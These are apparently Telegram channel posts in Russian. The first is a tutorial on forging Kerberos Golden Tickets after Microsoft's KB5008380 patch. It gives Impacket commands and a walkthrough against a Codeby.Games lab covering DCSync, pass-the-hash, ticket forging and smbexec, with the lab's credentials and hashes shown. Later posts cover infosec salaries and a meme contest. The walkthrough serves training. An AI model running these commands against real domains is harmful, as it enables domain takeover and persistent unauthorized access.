🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

ИБ != деньги
#мысли

Постоянно слышу вопросы, почему вот безопасникам или конкретно пентестерам платят мало. Давайте напишу своё мнение, которое вполне логичное:

1. Самая банальная причина, что бюджеты не резиновые. За последние года компании явно стали больше выделять на ИБ, это видно как и по улучшение общей защищенности РФ компаний. Так и по кол-ву компаний, которые открываются в сфере ИБ и переживаю первые 1-3 года, после основания
2. Деньги платит бизнес. Бизнес деньги получает с продаж. Следовательно получают больше те, кто эти продажи обеспечивают. В первую очередь наверное сейлы/пресейлы, затем разработчики, которые собственно и разрабатывают эти продукты. Аналитиков тоже в обиду не дают, когда они реально увеличивают прибыль компании. А мы, безопасники, не приносим прибыль, не беря консалтинговые услуги. Мы предотвращаем потерю этих денег. Не все безопасники, могут аргументировать бизнесу почему та или иная уязвимость для них приоритетна, помимо остальных "горящих" задач. Как мне вчера сказал один человек, "надо продавать бизнесу страх". Особенно на фоне оборотных штрафов, продавать этот страх бизнесу легко, главное знать кому и что.
3. Да, порог входа довольно высокий, но с каждым годом обучающих материалов становится всё больше и больше, а следовательно порог входа становится более мягкий. И даже сейчас у меня появляется ощущение, что пентесты делают все кому не лень, если говорить про низко-среднее качество и к сожалению это не только моё мнение.

📌 Бонус от меня:
ИБ надо любить. Я из тех людей, кто считает, чтобы долго работать в одном направлении его надо любить и не только за деньги. ИБ интересна своей сложностью, но пока вы дойдете до того уровня, когда сможете хоть чуть-чуть разжать булки, надо очень очень много работать и набивать шишки.

Этот пост может вызвать холивар, но я его написал с целью кидаться им в тех, кто говорит, мол почему в ИБ мало платят. Сегодня вот написали, что джуны в пентесте получают, как сотрудники в Теремке) Ну если нравится больше печь блины, то можно и в Теремке работать ;)

🌚 @poxek

🐣 Телеграм заскамился

Так я решил час назад, когда после оплаты гифта подписчику, он ему не пришёл, а деньги списались)
Но сейчас гифт дошёл, но я ему через бота купил другой уже, который сразу активировался у него.

Итого: у нас 1 телеграм премиум на полгода 💫

Чтобы его получить, надо просто прислать в чат смешной мем ПоИБэ, а насколько он годный оценит сами участники чата. Когда будете отправлять, обязательно тегните меня и поставьте #хочупремку. Мем должен быть уникальный, взять чужой не выйдет, я буду проверять)

Время: до сегодняшнего вечера

#meme #хочупремку

🌚 @poxek

🐈 Конкурс закончился!

Хотел до написания поста отдать ссылку на активацию премки телеги, но телега снова скаманула :D Хоть и написано, что её можно передавать кому угодно до активации, по факту передавать не получится, т.к. я вижу у себя в стате что ссылка не активировалась, но активировать не получатель её не смог(

Рад, что Вы так активно боролись за подписку. Критерии для оценки были такие:
1. Смешной ли мем мне и чату?
2. Его оригинальность
3. Реализм/жизненность
4. Наличие премки у участника

По сему победила дружба :D
но выбрать надо было одного, поэтому выбрал двух)) Дада, победили двое подписчиков!!

@smi1e_off — годные мемы:
Первый - Try Harder by OffSec
Второй - мемы под посты всегда кайф))

@fanofbtc — годные мемы:
Первый - бесконечно можно быть первым, ауф
Второй - тут лично у меня жиза

Ещё очень годный мем от вредмастера, но ему уже подписку дарил, а она не успела закончиться))
Но дабы он не дулся, оставлю ссылку на его канал @wr3dmast3rvs, т.к. он пишет годные хардовые статьи по веб-пентесту и вообще он молодец)

🌚 @poxek